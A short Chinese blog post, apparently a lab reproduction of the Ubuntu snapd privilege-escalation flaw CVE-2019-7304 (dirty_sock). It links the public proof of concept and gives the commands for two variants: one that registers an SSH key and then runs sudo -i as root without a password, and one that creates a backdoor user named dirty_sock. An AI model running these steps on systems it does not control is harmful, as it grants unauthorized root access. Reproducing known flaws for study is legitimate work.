Ubuntu 提权漏洞(CVE-2019-7304)复现

2022-09-09 14:37:48

漏洞描述:

Ubuntu 版本:

Ubuntu 18.10

Ubuntu 18.04 LTS

Ubuntu 16.04 LTS

Ubuntu 14.04 LTS

Ubuntu 提权漏洞(CVE-2019-7304)复现

2.28 < snapd < 2.37 会存在该漏洞

Poc Github:https://github.com/initstring/dirty_sock

 

#1

注册并登陆,https://login.ubuntu.com/ 在 Ubuntu 上,生成密钥 
ssh-keygen -t rsa -C "your_email@example.com"

Ubuntu 提权漏洞(CVE-2019-7304)复现

查看公钥

Ubuntu 提权漏洞(CVE-2019-7304)复现

将公钥复制到网站上

Ubuntu 提权漏洞(CVE-2019-7304)复现

接下来执行 poc

python3 ./dirty_sockv1.py -u "sch01ar@163.com" -k "../.ssh/id_rsa"

Ubuntu 提权漏洞(CVE-2019-7304)复现

执行完之后 sch01ar 被修改为 Ubuntu 上的用户名

接着切换为 root 用户

sudo -i

 Ubuntu 提权漏洞(CVE-2019-7304)复现

切换成 root 用户时不需要输入密码

 

#2

直接运行脚本

python3 dirty_sockv2.py

Ubuntu 提权漏洞(CVE-2019-7304)复现

执行完会生成一个 dirty_sock 的用户,密码也是这个

上一篇:Ubuntu 18.04 LTS搭建GO语言开发环境


下一篇:ubuntu 16.04LTS开机自启动(包括virtualenv、conda等虚拟环境)